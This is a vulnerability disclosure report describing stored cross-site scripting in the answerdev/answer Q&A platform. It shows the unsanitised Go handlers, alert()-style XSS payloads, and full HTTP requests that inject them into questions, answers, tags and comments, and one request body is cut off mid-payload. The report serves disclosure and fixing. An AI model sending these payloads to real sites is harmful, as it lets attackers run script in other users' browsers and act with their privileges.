Multiple XSS @ answer/question/tag in answerdev/answer
Reported on
Mar 8th 2023
Description
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Proof of Concept
Posting the Question:
func (req *QuestionAdd) Check() (errFields []*validator.FormErrorField, err error) {
req.HTML = converter.Markdown2HTML(req.Content)
for _, tag := range req.Tags {
if len(tag.OriginalText) > 0 {
tag.ParsedText = converter.Markdown2HTML(tag.OriginalText)
}
}
return nil, nil
}
Updating the Question:
func (req *QuestionUpdate) Check() (errFields []*validator.FormErrorField, err error) {
req.HTML = converter.Markdown2HTML(req.Content)
return nil, nil
}
Posting the Answer:
func (req *AnswerAddReq) Check() (errFields []*validator.FormErrorField, err error) {
req.HTML = converter.Markdown2HTML(req.Content)
return nil, nil
}
Updating the Answer:
func (req *AnswerUpdateReq) Check() (errFields []*validator.FormErrorField, err error) {
req.HTML = converter.Markdown2HTML(req.Content)
return nil, nil
}
Updating the Tag:
func (r *UpdateTagReq) Check() (errFields []*validator.FormErrorField, err error) {
if len(r.EditSummary) == 0 {
r.EditSummary = "tag.edit.summary"
}
r.ParsedText = converter.Markdown2HTML(r.OriginalText)
return nil, nil
}
Addning a comment:
func (req *AddCommentReq) Check() (errFields []*validator.FormErrorField, err error) {
req.ParsedText = converter.Markdown2HTML(req.OriginalText)
return nil, nil
}
Updating a Comment:
func (req *UpdateCommentReq) Check() (errFields []*validator.FormErrorField, err error) {
req.ParsedText = converter.Markdown2HTML(req.OriginalText)
return nil, nil
}
Payload:
<script>alert(1)<\\x00/script>
<style></style><img src=x onerror=alert(1)//>
Request @ Question:
POST /answer/api/v1/question HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
Content-Type: application/json
Content-Length: 213
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/questions/ask
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"title":"question","content":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>","tags":[{"original_text":"","parsed_text":"","slug_name":"nano","recommend":false,"reserved":false}]}
Request @ Answer:
POST /answer/api/v1/post/render HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
Content-Type: application/json
Content-Length: 95
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/questions/10010000000000007
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"content":"<script>Request @ Tag:
PUT /answer/api/v1/tag HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
Content-Type: application/json
Content-Length: 272
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/tags/10030000000000002/edit
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"display_name":"a","slug_name":"a","original_text":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>","parsed_text":"<style></style><img src=x onerror=alert(1)//><blockquote>\n</blockquote>\n","tag_id":"10030000000000002","edit_summary":""}
Request @ Comment:
POST /answer/api/v1/comment HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 1d798f13-bda1-11ed-9586-0242ac110002
Content-Type: application/json
Content-Length: 158
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/questions/10010000000000012/nadahh
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"object_id":"10020000000000015","original_text":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>","mention_username_list":[]}
Impact
The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs.
References
